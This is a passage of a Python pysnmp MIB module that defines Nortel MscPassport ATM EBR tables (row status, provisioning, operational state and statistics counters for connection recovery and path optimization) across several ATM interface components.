mscAtmIfUniEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 30, 1)).setIndexNames(
    (0, 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmUniMIB', 'mscAtmIfUniIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfUniEbrIndex'))
if mibBuilder.loadTexts:
    mscAtmIfUniEbrOperEntry.setStatus('mandatory')
mscAtmIfUniEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfUniEbrSubscribedConnections.setStatus('mandatory')
mscAtmIfUniEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 30, 1, 2), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfUniEbrEligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfUniEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 30, 1, 3), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfUniEbrIneligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfUniEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 40))
if mibBuilder.loadTexts:
    mscAtmIfUniEbrStatsTable.setStatus('mandatory')
mscAtmIfUniEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 40, 1)).setIndexNames(
    (0, 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmUniMIB', 'mscAtmIfUniIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfUniEbrIndex'))
if mibBuilder.loadTexts:
    mscAtmIfUniEbrStatsEntry.setStatus('mandatory')
mscAtmIfUniEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 40, 1, 1), Counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfUniEbrTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfUniEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 40, 1, 2), Counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfUniEbrTotalPathOptimizations.setStatus('mandatory')
# -- mscAtmIfIispEbr (…114.7.7): EBR component under the AtmIf Iisp component.
mscAtmIfIispEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7))
mscAtmIfIispEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 1))
if mibBuilder.loadTexts:
    mscAtmIfIispEbrRowStatusTable.setStatus('mandatory')
mscAtmIfIispEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 1, 1)).setIndexNames(
    (0, 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmIispMIB', 'mscAtmIfIispIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmEbrMIB',
'mscAtmIfIispEbrIndex'))
if mibBuilder.loadTexts:
    mscAtmIfIispEbrRowStatusEntry.setStatus('mandatory')
mscAtmIfIispEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 1, 1, 1), RowStatus()).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
    mscAtmIfIispEbrRowStatus.setStatus('mandatory')
mscAtmIfIispEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 1, 1, 2), DisplayString()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfIispEbrComponentName.setStatus('mandatory')
mscAtmIfIispEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 1, 1, 4), StorageType()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfIispEbrStorageType.setStatus('mandatory')
mscAtmIfIispEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts:
    mscAtmIfIispEbrIndex.setStatus('mandatory')
# Provisioning table (20): readwrite 1-byte OctetString masks, initial 0xc0.
mscAtmIfIispEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 20))
if mibBuilder.loadTexts:
    mscAtmIfIispEbrProvTable.setStatus('mandatory')
mscAtmIfIispEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 20, 1)).setIndexNames(
    (0, 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmIispMIB', 'mscAtmIfIispIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfIispEbrIndex'))
if mibBuilder.loadTexts:
    mscAtmIfIispEbrProvEntry.setStatus('mandatory')
mscAtmIfIispEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 20, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue='c0')).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
    mscAtmIfIispEbrConnectionRecovery.setStatus('mandatory')
mscAtmIfIispEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue='c0')).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
    mscAtmIfIispEbrPathOptimization.setStatus('mandatory')
mscAtmIfIispEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 30))
if mibBuilder.loadTexts:
    mscAtmIfIispEbrOperTable.setStatus('mandatory')
mscAtmIfIispEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 30, 1)).setIndexNames(
    (0, 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmIispMIB', 'mscAtmIfIispIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfIispEbrIndex'))
if mibBuilder.loadTexts:
    mscAtmIfIispEbrOperEntry.setStatus('mandatory')
mscAtmIfIispEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfIispEbrSubscribedConnections.setStatus('mandatory')
mscAtmIfIispEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 30, 1, 2), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfIispEbrEligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfIispEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 30, 1, 3), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfIispEbrIneligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfIispEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 40))
if mibBuilder.loadTexts:
    mscAtmIfIispEbrStatsTable.setStatus('mandatory')
mscAtmIfIispEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 40, 1)).setIndexNames(
    (0, 'Nortel-MsCarrier-MscPassport-AtmCoreMIB',
'mscAtmIfIndex'), (0, 'Nortel-MsCarrier-MscPassport-AtmIispMIB', 'mscAtmIfIispIndex'), (0, 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfIispEbrIndex'))
if mibBuilder.loadTexts:
    mscAtmIfIispEbrStatsEntry.setStatus('mandatory')
mscAtmIfIispEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 40, 1, 1), Counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfIispEbrTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfIispEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 40, 1, 2), Counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfIispEbrTotalPathOptimizations.setStatus('mandatory')
# -- mscAtmIfVptIispEbr (…114.9.6.7): EBR component under the Vpt Iisp
# -- component; indexed by AtmIf, Vpt, VptIisp and VptIispEbr indices.
mscAtmIfVptIispEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7))
mscAtmIfVptIispEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 1))
if mibBuilder.loadTexts:
    mscAtmIfVptIispEbrRowStatusTable.setStatus('mandatory')
mscAtmIfVptIispEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 1, 1)).setIndexNames(
    (0, 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmIispMIB', 'mscAtmIfVptIispIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptIispEbrIndex'))
if mibBuilder.loadTexts:
    mscAtmIfVptIispEbrRowStatusEntry.setStatus('mandatory')
mscAtmIfVptIispEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 1, 1, 1), RowStatus()).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
    mscAtmIfVptIispEbrRowStatus.setStatus('mandatory')
mscAtmIfVptIispEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 1, 1, 2), DisplayString()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptIispEbrComponentName.setStatus('mandatory')
mscAtmIfVptIispEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 1, 1, 4), StorageType()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptIispEbrStorageType.setStatus('mandatory')
mscAtmIfVptIispEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts:
    mscAtmIfVptIispEbrIndex.setStatus('mandatory')
mscAtmIfVptIispEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 20))
if mibBuilder.loadTexts:
    mscAtmIfVptIispEbrProvTable.setStatus('mandatory')
mscAtmIfVptIispEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 20, 1)).setIndexNames(
    (0, 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmIispMIB', 'mscAtmIfVptIispIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptIispEbrIndex'))
if mibBuilder.loadTexts:
    mscAtmIfVptIispEbrProvEntry.setStatus('mandatory')
mscAtmIfVptIispEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 20, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue='c0')).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
    mscAtmIfVptIispEbrConnectionRecovery.setStatus('mandatory')
mscAtmIfVptIispEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue='c0')).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
    mscAtmIfVptIispEbrPathOptimization.setStatus('mandatory')
mscAtmIfVptIispEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 30))
if mibBuilder.loadTexts:
    mscAtmIfVptIispEbrOperTable.setStatus('mandatory')
mscAtmIfVptIispEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 30, 1)).setIndexNames(
    (0, 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmIispMIB', 'mscAtmIfVptIispIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptIispEbrIndex'))
if mibBuilder.loadTexts:
    mscAtmIfVptIispEbrOperEntry.setStatus('mandatory')
mscAtmIfVptIispEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptIispEbrSubscribedConnections.setStatus('mandatory')
mscAtmIfVptIispEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 30, 1, 2), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptIispEbrEligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfVptIispEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 30, 1, 3), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptIispEbrIneligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfVptIispEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 40))
if mibBuilder.loadTexts:
    mscAtmIfVptIispEbrStatsTable.setStatus('mandatory')
mscAtmIfVptIispEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 40, 1)).setIndexNames(
    (0, 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmIispMIB', 'mscAtmIfVptIispIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptIispEbrIndex'))
if mibBuilder.loadTexts:
    mscAtmIfVptIispEbrStatsEntry.setStatus('mandatory')
mscAtmIfVptIispEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 40, 1, 1), Counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptIispEbrTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfVptIispEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 40, 1, 2), Counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptIispEbrTotalPathOptimizations.setStatus('mandatory')
# -- mscAtmIfVptPnniEbr (…114.9.7.7): EBR component under the Vpt Pnni
# -- component; same table layout as the Vpt Iisp EBR group above.
mscAtmIfVptPnniEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7))
mscAtmIfVptPnniEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 1))
if mibBuilder.loadTexts:
    mscAtmIfVptPnniEbrRowStatusTable.setStatus('mandatory')
mscAtmIfVptPnniEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 1, 1)).setIndexNames(
    (0, 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmPnniMIB', 'mscAtmIfVptPnniIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptPnniEbrIndex'))
if mibBuilder.loadTexts:
    mscAtmIfVptPnniEbrRowStatusEntry.setStatus('mandatory')
mscAtmIfVptPnniEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 1, 1, 1), RowStatus()).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
    mscAtmIfVptPnniEbrRowStatus.setStatus('mandatory')
mscAtmIfVptPnniEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 1, 1, 2), DisplayString()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptPnniEbrComponentName.setStatus('mandatory')
mscAtmIfVptPnniEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 1, 1, 4), StorageType()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptPnniEbrStorageType.setStatus('mandatory')
mscAtmIfVptPnniEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts:
    mscAtmIfVptPnniEbrIndex.setStatus('mandatory')
mscAtmIfVptPnniEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 20))
if mibBuilder.loadTexts:
    mscAtmIfVptPnniEbrProvTable.setStatus('mandatory')
mscAtmIfVptPnniEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 20, 1)).setIndexNames(
    (0, 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmPnniMIB', 'mscAtmIfVptPnniIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptPnniEbrIndex'))
if mibBuilder.loadTexts:
    mscAtmIfVptPnniEbrProvEntry.setStatus('mandatory')
mscAtmIfVptPnniEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 20, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue='c0')).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
    mscAtmIfVptPnniEbrConnectionRecovery.setStatus('mandatory')
mscAtmIfVptPnniEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue='c0')).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
    mscAtmIfVptPnniEbrPathOptimization.setStatus('mandatory')
mscAtmIfVptPnniEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 30))
if mibBuilder.loadTexts:
    mscAtmIfVptPnniEbrOperTable.setStatus('mandatory')
mscAtmIfVptPnniEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 30, 1)).setIndexNames(
    (0, 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmPnniMIB', 'mscAtmIfVptPnniIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptPnniEbrIndex'))
if mibBuilder.loadTexts:
    mscAtmIfVptPnniEbrOperEntry.setStatus('mandatory')
mscAtmIfVptPnniEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptPnniEbrSubscribedConnections.setStatus('mandatory')
mscAtmIfVptPnniEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 30, 1, 2), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptPnniEbrEligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfVptPnniEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 30, 1, 3), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptPnniEbrIneligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfVptPnniEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 40))
if mibBuilder.loadTexts:
    mscAtmIfVptPnniEbrStatsTable.setStatus('mandatory')
mscAtmIfVptPnniEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 40, 1)).setIndexNames(
    (0, 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmPnniMIB', 'mscAtmIfVptPnniIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptPnniEbrIndex'))
if mibBuilder.loadTexts:
    mscAtmIfVptPnniEbrStatsEntry.setStatus('mandatory')
mscAtmIfVptPnniEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 40, 1, 1),
Counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptPnniEbrTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfVptPnniEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 40, 1, 2), Counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptPnniEbrTotalPathOptimizations.setStatus('mandatory')
# -- mscAtmIfVptUniEbr (…114.9.8.7): EBR component under the Vpt Uni
# -- component; row-status (1), prov (20), oper (30) and stats (40) tables.
mscAtmIfVptUniEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7))
mscAtmIfVptUniEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 1))
if mibBuilder.loadTexts:
    mscAtmIfVptUniEbrRowStatusTable.setStatus('mandatory')
mscAtmIfVptUniEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 1, 1)).setIndexNames(
    (0, 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmUniMIB', 'mscAtmIfVptUniIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptUniEbrIndex'))
if mibBuilder.loadTexts:
    mscAtmIfVptUniEbrRowStatusEntry.setStatus('mandatory')
mscAtmIfVptUniEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 1, 1, 1), RowStatus()).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
    mscAtmIfVptUniEbrRowStatus.setStatus('mandatory')
mscAtmIfVptUniEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 1, 1, 2), DisplayString()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptUniEbrComponentName.setStatus('mandatory')
mscAtmIfVptUniEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 1, 1, 4), StorageType()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptUniEbrStorageType.setStatus('mandatory')
mscAtmIfVptUniEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts:
    mscAtmIfVptUniEbrIndex.setStatus('mandatory')
mscAtmIfVptUniEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 20))
if mibBuilder.loadTexts:
    mscAtmIfVptUniEbrProvTable.setStatus('mandatory')
mscAtmIfVptUniEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 20, 1)).setIndexNames(
    (0, 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmUniMIB', 'mscAtmIfVptUniIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptUniEbrIndex'))
if mibBuilder.loadTexts:
    mscAtmIfVptUniEbrProvEntry.setStatus('mandatory')
mscAtmIfVptUniEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 20, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue='c0')).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
    mscAtmIfVptUniEbrConnectionRecovery.setStatus('mandatory')
mscAtmIfVptUniEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue='c0')).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
    mscAtmIfVptUniEbrPathOptimization.setStatus('mandatory')
mscAtmIfVptUniEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 30))
if mibBuilder.loadTexts:
    mscAtmIfVptUniEbrOperTable.setStatus('mandatory')
mscAtmIfVptUniEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 30, 1)).setIndexNames(
    (0, 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmUniMIB', 'mscAtmIfVptUniIndex'),
